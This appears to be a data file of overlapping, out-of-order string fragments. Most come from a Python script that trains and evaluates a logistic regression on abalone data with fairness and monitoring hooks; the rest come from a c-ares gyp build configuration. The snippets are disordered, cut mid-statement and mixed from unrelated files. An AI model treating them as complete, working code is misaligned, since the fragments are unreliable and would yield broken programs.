"to load the data :type filepath: str :param target: Target variable :type target:",
"unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str,",
"= train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained model feature_names = x_train.columns.tolist()",
"a numpy array. :param filepath: Path to load the data :type filepath: str",
"print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects # binary label indicators",
":rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) #",
"x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for",
"C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group",
"test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score =",
"} } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the",
"load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects",
"numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision",
"multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) =",
"log metrics. :param pipe: Pipeline of transforms with a trained final estimator :type",
"pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray :param seed: `random_state` for logistic",
"feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7,",
"for logistic regression model :type seed: float :param C: Inverse of regularization strength",
"df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float",
"classification # For multiclass labels, we can use a \"micro-average\" by # quantifying",
"= metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro')",
"), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors) with",
"C: float = 1, verbose: bool = False) -> Pipeline: \"\"\" Scales the",
"dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath)",
"training :type X: pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray :param seed:",
"# unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath:",
"float ) return test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type'",
"name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name corresponding",
"xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred)",
"regression model. :param X: Features for training :type X: pandas.core.frame.DataFrame :param y: Target",
":type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type y_test: numpy.ndarray",
"testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type y_test:",
"len(df) if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\")",
"y_test: Target variable data for testing :type y_test: numpy.ndarray :param y_test_onehot: One hot",
"target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings']",
"from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler",
"y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float =",
"verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done",
"for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type",
"sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env",
"will allow us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list",
"f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap model and calculate",
"import pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import (",
"regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature and",
"8}, # Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify",
"pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type y_test: numpy.ndarray :param y_test_onehot:",
"One hot encoded target variable data :type y_test_onehot: numpy.ndarray :return: Test predicted probability",
"-> Pipeline: \"\"\" Scales the features and trains a logistic regression model. :param",
"list of float ) return test_prob, test_pred def main(): x_train, y_train = load_dataset(",
"strength :type C: float :param verbose: Whether to print additional info :type verbose:",
"feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder",
":return: Test predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test)",
"np.ndarray, seed: float = 0, C: float = 1, verbose: bool = False)",
"open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap",
"with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return df, y def",
"= {avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision",
"model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and",
"= LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling',",
"from boxkite.monitoring.encoder import MetricEncoder from environs import Env from sklearn import metrics from",
"Path to load the data :type filepath: str :param target: Target variable :type",
"= {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage",
"y_test_onehot) # Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [",
"pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe:",
"`roc_auc_score` and `average_precision_score` expects # binary label indicators with shape (n_samples, n_classes) enc",
"f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap model and calculate xafai",
"axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) #",
"joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic regression model.')",
"y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}')",
"numpy array. :param filepath: Path to load the data :type filepath: str :param",
"print('Saved Shap model and fairness results.') if __name__ == '__main__': bdrk.init() with bdrk.start_run():",
"= scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C,",
"y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list of float ) return test_prob,",
"distribution.') # Train Shap model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1],",
"10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped =",
"and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save",
"average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc =",
"pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len = len(df)",
"label indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1,",
"( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap",
"Features for training :type X: pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray",
"from sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from",
"- len(df) if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows with NA",
"test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision",
"the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] =",
"bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list of float ) return",
"{ \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1] \"privileged_group_name\":",
"target variable as a numpy array. :param filepath: Path to load the data",
".train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness results.')",
"metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob,",
":param y_test: Target variable data for testing :type y_test: numpy.ndarray :param y_test_onehot: One",
"predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc =",
"f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } ) # `log_chart_data`",
"OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic regression model.') test_prob, test_pred =",
"trained one hot encoder and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test,",
"same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list of",
"This will allow us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), #",
"np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe: Pipeline of transforms with",
"y_test, y_test_onehot) # Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors =",
"bdrk import numpy as np import pandas as pd from bdrk.model_analyzer import ModelAnalyzer,"
] |
[
"'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include',",
"'target_defaults': { 'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ]",
"'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [",
"{ 'target_defaults': { 'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE'",
"'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c',",
"}], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }],",
"'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h',",
"], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }] ] } ]",
"'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c',",
"'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e.",
"] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ],",
"{ 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ],",
"[ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0)",
"] }] ] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [",
"'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ]",
"{ 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS',",
"{ 'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }],",
"# Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500'",
"'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c',",
"'<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ]",
"'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c',",
"'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h',",
"], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ],",
"'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android'",
"] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32'",
"\"win android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [",
"[ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', {",
"'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h',",
"}], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings':",
"'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c',",
"'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs':",
"[ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }] ]",
"'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"',",
"'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h',",
"[ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs':",
"'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h',",
"'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [",
"'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [",
"], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ],",
"'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"',",
"'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not",
"'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources':",
"in \"win android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs':",
"'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c',",
"'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines':",
"'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs':",
"[ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [",
"'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', {",
"'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }] ] } ] }",
"'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] },",
"'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] },",
"'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [",
"'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c',",
"}, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ],",
"'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, {",
"'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c',",
"'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c',",
"'-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic',",
"or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [",
"'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c',",
"'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources':",
"'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c',",
"[ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [",
"[ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ]",
"}, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1',",
"{ 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs':",
"] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c',",
"'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }],",
"OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"',",
"}, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h',",
"'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for",
"'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h',",
"'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c',",
"'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ],",
"'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h',",
"'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB'",
"'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c',",
"], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib'",
"'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\"",
"malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ]",
"'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h',",
